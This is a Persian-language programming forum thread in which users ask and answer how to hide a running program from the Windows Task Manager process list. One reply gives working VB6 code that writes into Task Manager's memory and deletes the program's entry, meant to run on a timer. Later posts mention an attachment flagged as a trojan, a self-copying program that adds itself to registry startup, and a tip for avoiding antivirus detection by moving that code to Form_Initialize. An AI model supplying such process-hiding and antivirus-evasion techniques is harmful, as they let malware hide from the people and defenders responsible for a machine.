ali190
دوشنبه 25 مرداد 1389, 19:32 عصر
با سلام و عرض خسته نباشید
من چطور میتونم برنامه رو اجرا کنم و سپس با استفاده از کدهای vb یا دستورات api از آورده شدن نام اون برنامه در تب Processes پنجره windows task manager جلوگیری کنم؟
مثلاً من الان برنامه access 2003 رو اجرا کردم و نام این برنامه در حالت اجرا در اون پنجره وجود داره ولی میخوام با استفاده از یک فرم vb و نوشتن دستورات لازم در یک command از آورده شدن نام برنامه اکسس در لیست تب Processes پنجره windows task manager جلوگیری کنم و یه جورایی برنامه مخفی اجرا بشه
ممنون
Saman_12
دوشنبه 25 مرداد 1389, 20:10 عصر
سلام.
من قبلا یه فایل Dll دیده بودم که این کار رو می کرد اگر دیدمش براتون میزارم.(توی همین سایت هم بود!)
Saman_12
دوشنبه 25 مرداد 1389, 20:35 عصر
این سورس رو امتحان کن از همون Dll توش استفاده شده :
modirmasool
دوشنبه 25 مرداد 1389, 23:38 عصر
بفرمایین:
Private Type bkh
flag As Long
psz As Long
lParam As Long
pt As Long
vkDirection As Long
End Type
Private Declare Function VirtualAllocEx Lib "kernel32.dll" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As Long, ByRef lpdwProcessId As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function VirtualFreeEx Lib "kernel32.dll" (ByVal hProcess As Long, ByRef lpAddress As Any, ByRef dwSize As Long, ByVal dwFreeType As Long) As Long
Private Declare Function SendMessage Lib "user32.dll" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function GetCurrentProcessId Lib "kernel32.dll" () As Long
Private Declare Function KillTimer Lib "user32.dll" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function FindWindowEx Lib "user32.dll" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Private Sub Hide_Process(Name As String)
Dim pName As Long
Dim pType As Long
Dim l As Long
Dim Tid As Long
Dim hTid As Long
Dim pid As Long
Dim h As Long
Dim i As Long
Dim hProcess As Long
Dim f As bkh
Dim s As String
Dim bkh() As Byte
h = FindWindow(vbNullString, "Windows Task Manager")
KillTimer h, 0
h = FindWindowEx(h, 0, "#32770", vbNullString)
h = FindWindowEx(h, 0, "SysListView32", vbNullString)
If h = 0 Then Exit Sub
f.flag = 8 Or &H20
Call GetWindowThreadProcessId(h, pid)
hProcess = OpenProcess(1082, 0, pid)
bkh = StrConv(Name, vbFromUnicode)
pName = VirtualAllocEx(hProcess, 0, Len(Name) + 1, &H1000, 4)
WriteProcessMemory hProcess, pName, VarPtr(bkh(0)), Len(Name), l
f.psz = pName
pType = VirtualAllocEx(hProcess, 0, Len(f), &H1000, 4)
WriteProcessMemory hProcess, pType, VarPtr(f.flag), Len(f), l
i = SendMessage(h, &H1000 + 13, 0, pType)
If i <> -1 Then SendMessage h, &H1000 + 8, i, 0
VirtualFreeEx hProcess, pType, Len(f), &H8000
VirtualFreeEx hProcess, pName, LenB(Name) + 1, &H8000
End Sub
این کد رو هم در یه تایمر بذارین:
Hide_Process CStr(App.EXEName & ".exe")
M.T.P
چهارشنبه 27 مرداد 1389, 14:54 عصر
این سورس رو امتحان کن از همون Dll توش استفاده شده :
آنتی ویروس بهش گیر داد ، تروجان 1 :متفکر:
Saman_12
پنج شنبه 28 مرداد 1389, 01:58 صبح
عزیزم من شدیدا مخالف ویروس و اینجور ملنگ بازی ها هستم.(الان من روی سیستم آنتی نصب ندارم که بفهم ویروس یا تر جان بوده یا نه!)به هر حال اگه بوده شما ببخشین سعی میکنم از این به بعد بعد چک توسط آنتی سورس قرار بدم.:لبخند:
M.T.P جان اینو هم بدون که من خودم قبلا یه ویروس نویس بودم و اگه بخوام یه ویروس روی سیستم کسی بیندازم می دونم چی کارش کنم که هیچ آنتی ویروسی به اون گیر نده!!!!!
M.T.P
پنج شنبه 28 مرداد 1389, 16:05 عصر
عزیزم من شدیدا مخالف ویروس و اینجور ملنگ بازی ها هستم.(الان من روی سیستم آنتی نصب ندارم که بفهم ویروس یا تر جان بوده یا نه!)به هر حال اگه بوده شما ببخشین سعی میکنم از این به بعد بعد چک توسط آنتی سورس قرار بدم.:لبخند:
M.T.P جان اینو هم بدون که من خودم قبلا یه ویروس نویس بودم و اگه بخوام یه ویروس روی سیستم کسی بیندازم می دونم چی کارش کنم که هیچ آنتی ویروسی به اون گیر نده!!!!!
قصد جسارت نداشتم. محض اطلاع عرض کردم :اشتباه:
البته من یه برنامه تقویم نوشتم که وقتی اجراش کنی با استفاده از دستور کپی موجود در FSO خودش رو تو پوشه ویندوز کپی و آدرس در ریجستری جهت Start Up درج میشه که آنتی ویروس به عنوان ویروس شناساییش میکرد. یعنی به محض کامپایل شدن فایل اجرایی توسط vb6 بلافاصله آنتی ویروس عین بختک میفتاد روش. :لبخند:
تا اینکه دستور کپی رو به جای نوشتن در Form_Load در Form_Initialize نوشتم و همه چی حل شد.
من اون موقع آنتی ویروس نداشتم و این موضوع رو وقتی متوجه شدم که برنامه رو به یکی از دوستان دادم. فرداش گفت دستت درد نکنه رفیق عجب ویروسی نوشتی و ... :خجالت: :چشمک:
حالا موضوع اینجاست که خیلی هم نمیشه به آنتی ویروس ها حق داد.
مثلا اغلب شرکت های تولید کننده نرم افزار فایل های کرک شده برنامه هاشون در وب سایت ها رو به شرکت های سازنده آنتی ویروس گزارش میدن و در لیست سیاه ویروس ها قرار میگیره.
arash020
جمعه 29 مرداد 1389, 02:36 صبح
سلام
امیدوارم کارتو را بندازه
vBulletin® v4.2.5, Copyright ©2000-1404, Jelsoft Enterprises Ltd.